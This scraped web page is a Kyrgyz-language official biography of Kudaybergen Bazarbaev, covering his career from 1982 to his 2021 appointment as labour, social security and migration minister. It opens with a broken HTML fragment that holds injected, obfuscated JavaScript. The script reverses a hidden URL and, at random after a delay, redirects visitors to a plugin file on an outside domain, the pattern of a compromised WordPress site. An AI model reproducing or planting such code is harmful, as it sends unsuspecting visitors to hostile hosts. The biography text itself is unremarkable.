{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/10/420_420-bazarbaev-kudaybergen-bazarbaevich.jpg» alt=»» class=»wp-image-23248″/></figure></div>
<h5 class=)
Туулган жылы: 1958-жыл.
Билими: Жогорку билимдүү, 1982-жылы СССРдин 50 жылдыгы атындагы Кыргыз мамлекеттик университетин «Француз тили» адистиги боюнча аяктаган;
Эмгек ишмердиги:
1982-жылы КМУнун комсомол комитетинин катчысы болуп иштөө менен баштаган;
1982-1985-жж. Кыргызстан ЛКЖС БКнын лекторлор тобунун жетекчиси болуп иштеген;
1985-1987-жж. Кыргызстан КП Ленин райкомунун инструктору, бөлүм башчысынын орун басары;
1987-1990-жж. Кыргызстан КП Фрунзе шааркомунун инструктору;
1990-жылдын январь-май айлары Кыргызстан КП Октябрь райкомунун бөлүм башчысы;
1990-жылдын май–декабрь айлары Фрунзе шаарынын Октябрь райкеңешинин төрагасынын биринчи орун басары;
1990-1991-жж. Кыргыз Республикасынын Президентинин Аппаратынын уюштуруу-инспектордук секторунун башчысы;
1991-1992-жж. Кыргыз Республикасынын Президентинин Аппаратынын кадрлар секторунун башчысы;
1992-1993-жж. Кыргыз Республикасынын Президентинин Аппаратынын бөлүм башчысы;
1993-1998-жж. Бишкек шаарынын Биринчи Май райондук мамлекеттик администрациясынын башчысынын орун басары, биринчи орун басары;
1998-1999-жж. Бишкек шаарынын мэриясынын кирешелер булактарын талдоо жана маркетинг башкармалыгынын башчысы;
1999-2001-жж. Бишкек шаарынын вице-мэри;
2001-2002-жж. Бишкек шаарынын Октябрь райондук мамлекеттик администрациясынын башчысынын биринчи орун басары;
2002-2004-жж. Октябрь райондук санитардык тазалоо жана жашылдандыруу комбинатынын директору;
2004-2007-жж. Бишкек шаарынын Октябрь райондук мамлекеттик администрациясынын башчысынын орун басары;
2007-жылдын апрель – май айлары Кыргыз Республикасынын Өкмөтүнүн Аппаратынын жетекчиси;
2007-2010-жж. Боршайкомдун аппаратынын жетекчиси;
2010-жылдын август–декабрь айлары «Ата Мекен» социалисттик партиясынын Борбордук аппаратынын башчысы;
2010-2012-жж. Кыргыз Республикасынын Жогорку Кеңешинин «Ата Мекен» депутаттык фракциясынын бөлүм башчысы;
2012-2013-жж. Кыргыз Республикасынын Маданият жана туризм министринин орун басары;
2013-2016-жж. Кыргыз Республикасынын социалдык өнүктүрүү министри;
2019-2020-жж. Кыргыз Республикасынын Президентине караштуу Мамлекеттик башкаруу академиясынын проректору;
2020-2021-жж. Кыргыз Республикасынын Президентинин Аппаратынын гуманитардык өнүктүрүүнү мониторингдөө жана жарандык коомдун институттары менен өз ара аракеттешүү бөлүмүнүн башчысы.
2021-жылдын 13-октябрынан тартып эмгек, социалдык камсыздоо жана миграция министри;
«2-класстагы мамлекеттик кызматтын мамлекеттик кеңешчиси» класстык чини бар.
Кыргыз Республикасынын Ардак грамотасы менен сыйланган, Кыргыз Республикасынын мамлекеттик кызматына эмгек сиңирген кызматкер.
Саясий илимдердин кандидаты.